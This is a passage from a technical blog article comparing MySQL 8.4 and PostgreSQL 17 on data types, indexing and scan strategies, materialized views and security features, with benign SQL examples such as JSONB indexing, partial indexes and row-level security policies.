&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Data Type Category&lt;/th&gt;
&lt;th&gt;MySQL 8.4&lt;/th&gt;
&lt;th&gt;PostgreSQL 17&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;JSON Support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Good&lt;/strong&gt; - Binary storage, functional indexes&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Superior&lt;/strong&gt; - JSONB, GIN indexes, JSON_TABLE()&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Array Support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;None&lt;/strong&gt; - JSON arrays or normalized tables&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Native&lt;/strong&gt; - True arrays with rich operators&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Custom Types&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;Limited&lt;/strong&gt; - Basic ENUM only&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Extensive&lt;/strong&gt; - Composite, enum, domain types&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Range/Interval&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;Manual&lt;/strong&gt; - Separate start/end columns&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Native&lt;/strong&gt; - TSRANGE, DATERANGE with operators&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Geospatial&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Basic&lt;/strong&gt; - Simple geometry functions&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Advanced&lt;/strong&gt; - PostGIS extension, full GIS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Network Types&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;None&lt;/strong&gt; - Store as VARCHAR&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Native&lt;/strong&gt; - INET, CIDR with validation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;UUID Support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Manual&lt;/strong&gt; - CHAR(36) or BINARY(16)&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Native&lt;/strong&gt; - Dedicated type with functions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Learning Curve&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Simple&lt;/strong&gt; - Familiar SQL types&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;Complex&lt;/strong&gt; - Many specialized options&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  JSONB: A Game-Changer for Unstructured Data
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;PostgreSQL's JSONB support stands out as a critical differentiator&lt;/strong&gt;, particularly for applications dealing with unstructured or semi-structured data. This capability can eliminate the need for maintaining a separate document database for many use cases with moderate complexity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Advantages of PostgreSQL JSONB:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Native Binary Storage:&lt;/strong&gt; JSONB stores data in a decomposed binary format, enabling efficient querying and indexing without parsing overhead&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GIN Indexing:&lt;/strong&gt; Generalized Inverted Index (GIN) support allows fast lookups on JSON properties and containment operations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rich Operators:&lt;/strong&gt; Comprehensive set of operators for querying, filtering, and manipulating JSON data directly in SQL&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Type Safety:&lt;/strong&gt; Validates JSON structure while maintaining flexibility for schema-less data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Query Performance:&lt;/strong&gt; Eliminates the overhead of maintaining synchronization between a relational database and a separate document store&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Practical Implications:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When your application requires both structured relational data and flexible document-like storage, PostgreSQL's JSONB allows you to handle both within a single database system. This reduces architectural complexity, eliminates data synchronization issues, and simplifies your infrastructure.&lt;/p&gt;

&lt;p&gt;For simple to moderate unstructured data requirements, PostgreSQL can effectively replace a dedicated document database like MongoDB, providing the benefits of both relational and document-oriented approaches in one system.&lt;/p&gt;
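&lt;p&gt;To make this concrete, here is a minimal JSONB sketch; the schema and names are illustrative:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- PostgreSQL: JSONB column with a GIN index over the whole document
CREATE TABLE events (
  id BIGSERIAL PRIMARY KEY,
  payload JSONB NOT NULL
);

CREATE INDEX idx_events_payload ON events USING GIN (payload);

-- Containment query: can use the GIN index on any key, no per-path index needed
SELECT id FROM events
WHERE payload @&amp;gt; '{"type": "signup", "plan": "pro"}';
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;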

&lt;p&gt;&lt;strong&gt;MySQL's JSON Support:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;MySQL 8.4 provides functional JSON support with binary storage and path-specific indexing, which is adequate for basic JSON storage and retrieval. However, it lacks the comprehensive indexing capabilities and rich operator set that PostgreSQL offers, making it less suitable for heavy JSON querying workloads.&lt;/p&gt;
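&lt;p&gt;For comparison, MySQL indexes JSON one extracted path at a time via functional indexes. A minimal sketch (names are hypothetical):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- MySQL 8.0.13+: functional index on a single JSON path
CREATE TABLE events (
  id BIGINT AUTO_INCREMENT PRIMARY KEY,
  payload JSON NOT NULL,
  INDEX idx_user ((CAST(payload-&amp;gt;&amp;gt;'$.user_id' AS UNSIGNED)))
);

-- Only queries matching this exact expression can use the index
SELECT id FROM events
WHERE CAST(payload-&amp;gt;&amp;gt;'$.user_id' AS UNSIGNED) = 123;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;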

&lt;h2&gt;
  
  
  4. Indexing Capabilities: Different Strategies for Different Needs
&lt;/h2&gt;

&lt;p&gt;This is where things get really interesting. MySQL and PostgreSQL have fundamentally different indexing philosophies, and understanding these differences will save you a lot of headaches.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Indexing Aspect&lt;/th&gt;
&lt;th&gt;MySQL 8.4&lt;/th&gt;
&lt;th&gt;PostgreSQL 17&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Index Architecture&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔵 &lt;strong&gt;Clustered&lt;/strong&gt; - Data stored in PK order&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Heap&lt;/strong&gt; - Data stored separately from indexes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Index Types&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;Limited&lt;/strong&gt; - Primarily B-tree + JSON functional&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Extensive&lt;/strong&gt; - B-tree, GIN, GiST, BRIN, partial, expression&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Key Access&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Exceptional&lt;/strong&gt; - Direct clustered access&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Good&lt;/strong&gt; - Index + heap lookup&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Complex Queries&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Limited&lt;/strong&gt; - B-tree optimization only&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Excellent&lt;/strong&gt; - Specialized indexes for any pattern&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Configuration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Simple&lt;/strong&gt; - Automatic optimization&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;Complex&lt;/strong&gt; - Requires index type selection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Random Inserts&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;Slower&lt;/strong&gt; - Clustered hotspots&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Consistent&lt;/strong&gt; - No clustering overhead&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;JSON Indexing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Functional&lt;/strong&gt; - Path-specific indexes&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Advanced&lt;/strong&gt; - GIN indexes on entire documents&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Partial Indexes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;None&lt;/strong&gt; - Must index entire column&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Native&lt;/strong&gt; - Index only matching conditions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Expression Indexes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Full Support&lt;/strong&gt; - Functional indexes on any expression (8.0.13+)&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Full support&lt;/strong&gt; - Any computed expression&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;💡 &lt;strong&gt;For deeper understanding:&lt;/strong&gt; To fully grasp how index scans work and why these differences matter, refer to &lt;a href="https://dev.to/harry_do/part-2-mysql-vs-postgresql-storage-architecture-2ki1" rel="noopener noreferrer"&gt;Part 2 - Storage Architecture&lt;/a&gt;, where we explore the underlying storage architectures (clustered vs heap-based storage) that drive these indexing behaviors.&lt;/p&gt;
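&lt;p&gt;Partial indexes from the table above deserve a concrete example, since they have no MySQL equivalent (table and column names are hypothetical):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- PostgreSQL: index only the rows you actually query.
-- If 95% of orders are 'completed', this index stays tiny.
CREATE INDEX idx_orders_pending
ON orders (customer_id)
WHERE status = 'pending';

-- Queries whose WHERE clause implies the index predicate can use it
SELECT * FROM orders
WHERE customer_id = 123 AND status = 'pending';
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;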

&lt;h2&gt;
  
  
  5. Index Scan Types: How They Actually Find Your Data
&lt;/h2&gt;

&lt;p&gt;Here's where the rubber meets the road. Both databases can scan indexes, but they do it in their own special ways.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scan Type&lt;/th&gt;
&lt;th&gt;MySQL 8.4&lt;/th&gt;
&lt;th&gt;PostgreSQL 17&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Index Scan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Standard&lt;/strong&gt; - B-tree traversal to find rows&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Standard&lt;/strong&gt; - B-tree traversal to find rows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Index Only Scan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Covering Index&lt;/strong&gt; - Composite secondary indexes can satisfy queries without table access&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Native&lt;/strong&gt; - Index-only scan without heap access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Bitmap Scan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;None&lt;/strong&gt; - Uses range or index merge&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Advanced&lt;/strong&gt; - Bitmap heap scan for multiple conditions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Sequential Scan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Full Table&lt;/strong&gt; - Reads all table pages&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Full Table&lt;/strong&gt; - Reads all table pages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Index Range Scan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Efficient&lt;/strong&gt; - Range queries on clustered/secondary indexes&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Efficient&lt;/strong&gt; - Range queries with heap lookups&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Parallel Scans&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Basic&lt;/strong&gt; - Parallel query execution (8.0+)&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Advanced&lt;/strong&gt; - Parallel index, bitmap, and sequential scans&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  The Bitmap Scan Deep Dive
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Bitmap Scan (PostgreSQL's Secret Weapon)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;PostgreSQL's bitmap scan is one of those features that makes database nerds weep with joy. It's a sophisticated strategy for handling complex WHERE clauses with multiple conditions, and it's something MySQL simply doesn't have.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How Bitmap Scan Actually Works:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Let's say you have this query:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Query with multiple conditions&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;orders&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;customer_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;123&lt;/span&gt;
&lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;order_date&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="s1"&gt;'2024-01-01'&lt;/span&gt;
&lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'pending'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- PostgreSQL execution plan:&lt;/span&gt;
&lt;span class="c1"&gt;-- 1. Bitmap Index Scan on idx_customer (customer_id = 123)&lt;/span&gt;
&lt;span class="c1"&gt;-- 2. Bitmap Index Scan on idx_date (order_date &amp;gt;= '2024-01-01')&lt;/span&gt;
&lt;span class="c1"&gt;-- 3. Bitmap Index Scan on idx_status (status = 'pending')&lt;/span&gt;
&lt;span class="c1"&gt;-- 4. BitmapAnd: Combine all bitmaps using AND operation&lt;/span&gt;
&lt;span class="c1"&gt;-- 5. Bitmap Heap Scan: Access heap pages only for matching rows&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why Bitmap Scans Are So Cool:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multiple Index Combination:&lt;/strong&gt; Efficiently combines multiple indexes using bitmap operations—it's like magic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reduced Heap Access:&lt;/strong&gt; Only accesses heap pages that contain matching rows—no wasted I/O&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory Efficient:&lt;/strong&gt; Bitmap representation is compact compared to storing all row pointers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complex Conditions:&lt;/strong&gt; Handles OR, AND combinations of multiple indexes seamlessly—handles whatever you throw at it&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;What MySQL Does Instead:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- MySQL uses index intersection or chooses best single index&lt;/span&gt;
&lt;span class="c1"&gt;-- Option 1: Index intersection (limited support)&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;orders&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;customer_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;123&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;order_date&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="s1"&gt;'2024-01-01'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Option 2: Query optimizer chooses single best index&lt;/span&gt;
&lt;span class="c1"&gt;-- Typically uses idx_customer, then filters remaining conditions&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  6. Views Support: Real-Time vs Pre-Computed
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;View Feature&lt;/th&gt;
&lt;th&gt;MySQL 8.4&lt;/th&gt;
&lt;th&gt;PostgreSQL 17&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Standard Views&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Full Support&lt;/strong&gt; - Dynamic query execution&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Full Support&lt;/strong&gt; - Dynamic query execution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Materialized Views&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;None&lt;/strong&gt; - Must use tables + triggers&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Native&lt;/strong&gt; - Pre-computed and stored results&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;View Updates&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Limited&lt;/strong&gt; - Simple views only&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Advanced&lt;/strong&gt; - Complex views with rules&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Refresh Options&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;Manual&lt;/strong&gt; - Application-level logic&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Flexible&lt;/strong&gt; - Manual REFRESH, optionally CONCURRENTLY&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Performance&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;Query-dependent&lt;/strong&gt; - No caching mechanism&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Optimized&lt;/strong&gt; - Materialized views cache results&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Storage Overhead&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Minimal&lt;/strong&gt; - Views are just queries&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;Higher&lt;/strong&gt; - Materialized views require storage&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Why Materialized Views Matter
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Materialized Views are a game-changer for analytical workloads and complex reporting.&lt;/strong&gt; PostgreSQL's native support for materialized views provides a significant advantage over MySQL in scenarios where you need to optimize expensive, frequently-accessed queries.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What Makes Materialized Views Special:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pre-computed Results:&lt;/strong&gt; Instead of executing a complex query every time, the results are computed once and stored physically on disk&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Indexable:&lt;/strong&gt; You can create indexes on materialized views, making them as fast as regular tables for subsequent queries&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Flexible Refresh:&lt;/strong&gt; Choose when to refresh: manually on demand, on a schedule via cron, or from your own triggers. PostgreSQL does not refresh materialized views automatically&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Perfect for Analytics:&lt;/strong&gt; Dashboards, reports, and analytical queries that aggregate millions of rows can return instantly instead of taking seconds or minutes&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Real-World Impact:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Imagine a dashboard that shows sales analytics by aggregating millions of transactions. With standard views in MySQL, this query runs every time someone loads the dashboard. With PostgreSQL's materialized views, you compute it once (say, every hour), and all dashboard accesses are instant—just reading pre-computed data.&lt;/p&gt;
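&lt;p&gt;The dashboard scenario above might look like this in PostgreSQL (the schema is illustrative):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- Compute the expensive aggregation once and store the result
CREATE MATERIALIZED VIEW daily_sales AS
SELECT order_date, SUM(amount) AS total, COUNT(*) AS order_count
FROM transactions
GROUP BY order_date;

-- A unique index makes CONCURRENTLY refresh possible (and speeds up lookups)
CREATE UNIQUE INDEX idx_daily_sales ON daily_sales (order_date);

-- Refresh on your own schedule (e.g., hourly via cron);
-- CONCURRENTLY avoids blocking readers during the refresh
REFRESH MATERIALIZED VIEW CONCURRENTLY daily_sales;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;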

&lt;p&gt;&lt;strong&gt;MySQL's Workaround:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Without native materialized views, MySQL users must manually create summary tables, write triggers or scheduled jobs to keep them updated, and implement their own refresh logic. This is error-prone, harder to maintain, and requires significant application-level code.&lt;/p&gt;

&lt;h2&gt;
  
  
  7. Security Features: Locking Down Your Data
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Security Feature&lt;/th&gt;
&lt;th&gt;MySQL 8.4&lt;/th&gt;
&lt;th&gt;PostgreSQL 17&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Authentication Methods&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Multiple&lt;/strong&gt; - Native, LDAP, PAM plugins&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Extensive&lt;/strong&gt; - Native, LDAP, Kerberos, RADIUS, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Row-Level Security&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 &lt;strong&gt;None&lt;/strong&gt; - Application-level implementation required&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Native&lt;/strong&gt; - Built-in row-level security policies&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Column Encryption&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Basic&lt;/strong&gt; - Transparent data encryption (TDE)&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Advanced&lt;/strong&gt; - Column-level encryption with pgcrypto&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SSL/TLS Support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Full&lt;/strong&gt; - Complete SSL/TLS implementation&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Full&lt;/strong&gt; - Complete SSL/TLS implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audit Logging&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Enterprise&lt;/strong&gt; - Available in commercial version&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Open Source&lt;/strong&gt; - pgAudit extension available&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;User Management&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Standard&lt;/strong&gt; - Role-based access control&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Advanced&lt;/strong&gt; - Sophisticated role hierarchy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Data Masking&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Enterprise&lt;/strong&gt; - Commercial feature&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Community&lt;/strong&gt; - Available through extensions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Compliance Features&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🟡 &lt;strong&gt;Enterprise-focused&lt;/strong&gt; - Commercial compliance tools&lt;/td&gt;
&lt;td&gt;🟢 &lt;strong&gt;Built-in&lt;/strong&gt; - Strong compliance capabilities&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;PostgreSQL's Row-Level Security: A Nice Addition&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;PostgreSQL offers native row-level security (RLS), letting you define security policies directly in the database that automatically filter rows based on the current user or session. MySQL has no equivalent, so row-level filtering must be implemented in application code.&lt;/p&gt;
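&lt;p&gt;A minimal RLS sketch, assuming a multi-tenant table and a session variable carrying the tenant ID (all names are hypothetical):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- PostgreSQL: each tenant only sees its own rows
ALTER TABLE orders ENABLE ROW LEVEL SECURITY;

CREATE POLICY tenant_isolation ON orders
USING (tenant_id = current_setting('app.tenant_id')::INT);

-- The application sets the tenant per connection or transaction:
SET app.tenant_id = '42';
-- From here on, SELECT/UPDATE/DELETE on orders are filtered automatically.
-- Note: table owners and superusers bypass RLS unless you use FORCE.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;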

&lt;p&gt;&lt;strong&gt;The Trade-off:&lt;/strong&gt; Both databases provide solid security fundamentals. PostgreSQL includes more advanced security features in the open-source edition, while MySQL reserves some advanced features for the commercial Enterprise Edition.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrapping Up
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Design Philosophy Summary
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Priority&lt;/th&gt;
&lt;th&gt;MySQL 8.4&lt;/th&gt;
&lt;th&gt;PostgreSQL 17&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Focus&lt;/strong&gt;&lt;/td&gt;
